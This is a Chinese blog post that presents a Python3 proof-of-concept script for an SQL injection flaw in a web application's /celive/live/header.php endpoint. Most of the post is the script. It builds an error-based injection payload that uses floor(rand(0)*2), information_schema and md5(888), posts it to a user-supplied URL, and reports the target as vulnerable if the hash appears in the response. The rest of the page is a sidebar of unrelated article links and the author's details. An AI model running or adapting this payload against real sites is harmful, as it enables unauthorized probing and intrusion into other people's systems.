Python3实现PoC——wooyun
发布时间:2019-09-26 07:27:17编辑:auto阅读(2361)
一、演示一下的利用效果
二、漏洞说明
这次的PoC是验证SQL注入,漏洞详情
三、代码+注释
import requests
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest="url")
args = parser.parse_args()
url = args.url
# 存在漏洞的页面
url += "/celive/live/header.php"
# 构造payload,用md5结果来验证
payload = {
'xajax': 'LiveMessage',
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),"
"concat(floor(rand(0)*2),(select md5(888)))a"
" from information_schema.tables group by a)b)"
",'','','','1','127.0.0.1','2') #"
}
try:
r = requests.post(url, data=payload)
if(r.status_code == requests.codes.ok):
if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:
print("{} is SQL_vul".format(url))
else:
print("{} is not SQL_vul".format(url))
except Exception as e:
print(str(e))
上一篇: python3 三级菜单-基础版
下一篇: Python3 生成一个随机验证码
- openvpn linux客户端使用
51021
- H3C基本命令大全
50399
- openvpn windows客户端使用
41015
- H3C IRF原理及 配置
37882
- Python exit()函数
32347
- openvpn mac客户端使用
29240
- python全系列官方中文文档
28121
- python 获取网卡实时流量
22954
- 1.常用turtle功能函数
22922
- python 获取Linux和Windows硬件信息
21251
- Python搭建一个RAG系统(分片/检索/召回/重排序/生成)
1126°
- Browser-use:智能浏览器自动化(Web-Agent)
1817°
- 使用 LangChain 实现本地 Agent
1475°
- 使用 LangChain 构建本地 RAG 应用
1415°
- 使用LLaMA-Factory微调大模型的function calling能力
1698°
- 复现一个简单Agent系统
1501°
- LLaMA Factory-Lora微调实现声控语音多轮问答对话-1
2161°
- LLaMA Factory微调后的模型合并导出和部署-4
3729°
- LLaMA Factory微调模型的各种参数怎么设置-3
3664°
- LLaMA Factory构建高质量数据集-2
2577°
- 姓名:Run
- 职业:谜
- 邮箱:383697894@qq.com
- 定位:上海 · 松江
